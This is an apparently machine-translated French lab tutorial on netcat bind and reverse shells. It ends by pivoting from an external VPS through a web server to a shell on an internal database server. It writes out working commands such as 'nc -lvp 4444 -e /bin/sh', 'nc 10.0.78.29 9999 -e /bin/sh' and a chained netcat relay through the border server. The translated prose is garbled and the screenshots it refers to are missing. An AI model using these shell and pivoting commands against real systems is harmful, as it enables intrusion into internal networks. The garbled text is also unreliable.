Dans cette démonstration, dans l'environnement Linux,
lorsque la machine réseau externe est généralement utilisé pour accéder à la machine du réseau interne, la coque arrière est souvent utilisé. La coque avant est souvent utilisé entre la machine de réseau interne et la machine du réseau interne. L'
avant shell est
dû au réseau interne et au serveur de limite. Par conséquent, nous démontrons d'abord le shell avant (le shell avant est à surveiller sur la machine cible):
Commande sur la machine intranet: nc -lvp 4444 -e / bin / sh
Commande on la machine locale: nc 10.0.78.41 4444
Afficher déjà connecté
pour vérifier:
Cela signifie que la connexion directe est réussie. Le
shell inversé
doit surveiller sur le vps local et se connecter à la
machine cible . Commande sur la machine locale: nc -lvp 9999
Commande sur la machine du réseau interne: nc 10.0.78.29 9999 -e / bin / sh
Afficher déjà connecté
pour vérifier:
Expliquez que la connexion inversée a réussi.
Ensuite, entraînez-vous à utiliser un ordinateur réseau interne distant à shell inversé d'une machine réseau externe, en utilisant le serveur frontalier comme tremplin.
Conditions de préparation:
1. Machine réseau externe (vps)
2. Serveur frontalier (serveur Web )
3. Serveur intranet (serveur de base de données)
Vps et serveur Web, le serveur de base de données est séparé par un pare-feu lan IP: 192.168.101.1 et
chaque IP est la suivante:
1. Machine réseau externe (vps)
2. Serveur frontalier (serveur Web)
3. Serveur intranet (serveur de base de données)
Ensuite,
entrez la commande dans vps: nc -lvp 1234
Entrez la commande dans le serveur de base de données: nc -lvp 1234 -e / bin / sh
Entrez la commande dans le serveur Web: nc -v 10.0.78.29 1234 -c "nc - v 192.168.101.103 1234 "
Afficher déjà connecté
pour vérifier:
Trouvé que l'adresse IP est l'adresse IP du serveur de base de données à ce moment, succès